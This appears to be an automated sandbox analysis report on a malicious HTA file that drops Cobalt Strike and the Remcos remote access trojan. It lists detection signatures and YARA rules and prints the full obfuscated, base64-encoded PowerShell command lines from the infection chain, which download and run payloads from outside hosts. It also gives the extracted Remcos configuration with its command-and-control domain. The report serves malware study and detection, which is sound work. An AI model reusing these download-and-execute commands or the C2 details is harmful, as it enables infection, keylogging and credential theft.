Edit tour
Windows
Analysis Report
seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta
Overview
General Information
Detection
Cobalt Strike, Remcos
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected obfuscated html page
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 3608 cmdline:
mshta.exe "C:\Users\ user\Deskt op\seetheb estmethodw ithgreatne ssgoodnews greatdaygi venme.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) - cmd.exe (PID: 3200 cmdline:
"C:\Window s\system32 \cmd.exe" "/C POWers hEll -eX BYPaSS -nop -W 1 -c DEvIceCre deNTIALdep LoYMeNT ; invOKE-E xPreSSiOn( $(InVOKE-E XPResSioN( '[sYSTeM.T EXt.eNcOdI Ng]'+[CHaR ]0x3A+[Cha r]58+'UTf8 .getSTriNG ([SYsTEM.C ONVeRt]'+[ ChaR]58+[C haR]0X3a+' fROMBAse64 StRING('+[ chaR]34+'J FhVVUxxNFN WUVBUICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI D0gICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgYWR kLVRZUEUgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgLU1lTUJ FUmRlRkluS VRJT24gICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gJ1tEbGxJb XBvcnQoInV SbG1vTiIsI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIENoYXJ TZXQgPSBDa GFyU2V0LlV uaWNvZGUpX XB1YmxpYyB zdGF0aWMgZ Xh0ZXJuIEl udFB0ciBVU kxEb3dubG9 hZFRvRmlsZ ShJbnRQdHI gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgRHF0T 0F2SHosc3R yaW5nICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI HdZRkVWdVp JcCxzdHJpb mcgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgRyx 1aW50ICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI EhneU1abVp WLEludFB0c iAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICBocWZ Kb1lkbEduK TsnICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIC1 uQW1FICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CJ6TUJpbSI gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgLU5hT UVTcGFjRSA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICBseHlEb CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAtUGF zc1RocnU7I CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICRYVVV McTRTVlFQV Do6VVJMRG9 3bmxvYWRUb 0ZpbGUoMCw iaHR0cDovL zc0LjIwOC4 4MC4yNDgvN DMvc2Vld2h hdGlhbWRva W5nZm9yeW9 1d2l0aGdyZ WF0bmVzc3R oaW5nc2dpd mVubWViYWN rLnRJRiIsI iRlTlY6QVB QREFUQVxzZ WV3aGF0aWF tZG9pbmdmb 3J5b3V3aXR oZ3JlYXRuZ XNzdGhpbmd zZ2l2ZW5tZ WIudmJTIiw wLDApO3NUY XJULVNMRUV wKDMpO0lud k9LZS1leFB yZVNzaW9OI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICIkRW5 WOkFQUERBV EFcc2Vld2h hdGlhbWRva W5nZm9yeW9 1d2l0aGdyZ WF0bmVzc3R oaW5nc2dpd mVubWViLnZ iUyI='+[ch Ar]0X22+') )')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 948 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 1776 cmdline:
POWershEll -e X BY PaSS -nop -W 1 - c DE vIceCredeN TIALdepLoY MeNT ; i nvOKE-ExPr eSSiOn($(I nVOKE-EXPR esSioN('[s YSTeM.TEXt .eNcOdINg] '+[CHaR]0x 3A+[Char]5 8+'UTf8.ge tSTriNG([S YsTEM.CONV eRt]'+[Cha R]58+[ChaR ]0X3a+'fRO MBAse64StR ING('+[cha R]34+'JFhV VUxxNFNWUV BUICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgID0g ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgYWRkLV RZUEUgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg LU1lTUJFUm RlRkluSVRJ T24gICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgJ1 tEbGxJbXBv cnQoInVSbG 1vTiIsICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg IENoYXJTZX QgPSBDaGFy U2V0LlVuaW NvZGUpXXB1 YmxpYyBzdG F0aWMgZXh0 ZXJuIEludF B0ciBVUkxE b3dubG9hZF RvRmlsZShJ bnRQdHIgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgRHF0T0F2 SHosc3RyaW 5nICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIHdZ RkVWdVpJcC xzdHJpbmcg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgRyx1aW 50ICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIEhn eU1abVpWLE ludFB0ciAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICBocWZKb1 lkbEduKTsn ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIC1uQW 1FICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICJ6 TUJpbSIgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgLU5hTUVT cGFjRSAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC BseHlEbCAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAtUGFzc1 RocnU7ICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICRYVVVMcT RTVlFQVDo6 VVJMRG93bm xvYWRUb0Zp bGUoMCwiaH R0cDovLzc0 LjIwOC44MC 4yNDgvNDMv c2Vld2hhdG lhbWRvaW5n Zm9yeW91d2 l0aGdyZWF0 bmVzc3RoaW 5nc2dpdmVu bWViYWNrLn RJRiIsIiRl TlY6QVBQRE FUQVxzZWV3 aGF0aWFtZG 9pbmdmb3J5 b3V3aXRoZ3 JlYXRuZXNz dGhpbmdzZ2 l2ZW5tZWIu dmJTIiwwLD ApO3NUYXJU LVNMRUVwKD MpO0ludk9L ZS1leFByZV NzaW9OICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICIkRW5WOk FQUERBVEFc c2Vld2hhdG lhbWRvaW5n Zm9yeW91d2 l0aGdyZWF0 bmVzc3RoaW 5nc2dpdmVu bWViLnZiUy I='+[chAr] 0X22+'))') ))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - csc.exe (PID: 5748 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" /noc onfig /ful lpaths @"C :\Users\us er\AppData \Local\Tem p\bxb5o0my \bxb5o0my. cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) - cvtres.exe (PID: 672 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S207F.tmp" "c:\Users \user\AppD ata\Local\ Temp\bxb5o 0my\CSC331 954E1B244E C883461F7D 54BF3FA4.T MP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) - wscript.exe (PID: 612 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\seewh atiamdoing foryouwith greatnesst hingsgiven meb.vbS" MD5: FF00E0480075B095948000BDC66E81F0) - powershell.exe (PID: 5924 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" $combo = ' JGNhbXBlc3 QgPSAnaHR0 cHM6Ly9yZX MuY2xvdWRp bmFyeS5jb2 0vZHp2YWk4 NnVoL2ltYW dlL3VwbG9h ZC92MTczND A1MDk5MS91 bnhhb29peW t4Zm13OXBh bjR6MS5qcG cgJzskcmVk b3VidGVkID 0gTmV3LU9i amVjdCBTeX N0ZW0uTmV0 LldlYkNsaW VudDskcHlj bmlkID0gJH JlZG91YnRl ZC5Eb3dubG 9hZERhdGEo JGNhbXBlc3 QpOyRvcmFj dWxvdXMgPS BbU3lzdGVt LlRleHQuRW 5jb2Rpbmdd OjpVVEY4Lk dldFN0cmlu ZygkcHljbm lkKTskbGFs bGF0aW9uID 0gJzw8QkFT RTY0X1NUQV JUPj4nOyRk ZXN0ZW1zID 0gJzw8QkFT RTY0X0VORD 4+Jzskc2Nh cHVsZXQgPS Akb3JhY3Vs b3VzLkluZG V4T2YoJGxh bGxhdGlvbi k7JGh5ZHJv ZWxlY3RyaW MgPSAkb3Jh Y3Vsb3VzLk luZGV4T2Yo JGRlc3RlbX MpOyRzY2Fw dWxldCAtZ2 UgMCAtYW5k ICRoeWRyb2 VsZWN0cmlj IC1ndCAkc2 NhcHVsZXQ7 JHNjYXB1bG V0ICs9ICRs YWxsYXRpb2 4uTGVuZ3Ro OyRwYWlsbW FpbCA9ICRo eWRyb2VsZW N0cmljIC0g JHNjYXB1bG V0OyRoYWdy aWRlcyA9IC RvcmFjdWxv dXMuU3Vic3 RyaW5nKCRz Y2FwdWxldC wgJHBhaWxt YWlsKTskc3 VwZXJsaW5l YXIgPSAtam 9pbiAoJGhh Z3JpZGVzLl RvQ2hhckFy cmF5KCkgfC BGb3JFYWNo LU9iamVjdC B7ICRfIH0p Wy0xLi4tKC RoYWdyaWRl cy5MZW5ndG gpXTskdHVy a2lzaG5lc3 MgPSBbU3lz dGVtLkNvbn ZlcnRdOjpG cm9tQmFzZT Y0U3RyaW5n KCRzdXBlcm xpbmVhcik7 JGFtcGhpZ2 VuaWEgPSBb U3lzdGVtLl JlZmxlY3Rp b24uQXNzZW 1ibHldOjpM b2FkKCR0dX JraXNobmVz cyk7JHRlbG lmZXJhID0g W2RubGliLk lPLkhvbWVd LkdldE1ldG hvZCgnVkFJ Jyk7JHRlbG lmZXJhLklu dm9rZSgkbn VsbCwgQCgn MC9uS050My 9yL2VlLmV0 c2FwLy86c3 B0dGgnLCAn JHJldmFuY2 hpc3RzJywg JyRyZXZhbm NoaXN0cycs ICckcmV2YW 5jaGlzdHMn LCAnQ2FzUG 9sJywgJyRy ZXZhbmNoaX N0cycsICck cmV2YW5jaG lzdHMnLCck cmV2YW5jaG lzdHMnLCck cmV2YW5jaG lzdHMnLCck cmV2YW5jaG lzdHMnLCck cmV2YW5jaG lzdHMnLCck cmV2YW5jaG lzdHMnLCcx JywnJHJldm FuY2hpc3Rz JywnJykpOw ==';$praso n = [Syste m.Text.Enc oding]::UT F8.GetStri ng([System .Convert]: :FromBase6 4String($c ombo));Inv oke-Expres sion $pras on MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 1364 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - CasPol.exe (PID: 1776 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Cas Pol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity. |
{"Host:Port:Password": ["kiolokgangan.duckdns.org:2430:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-H22KKM", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
Click to see the 20 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
REMCOS_RAT_variants | unknown | unknown |
| |
Click to see the 20 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |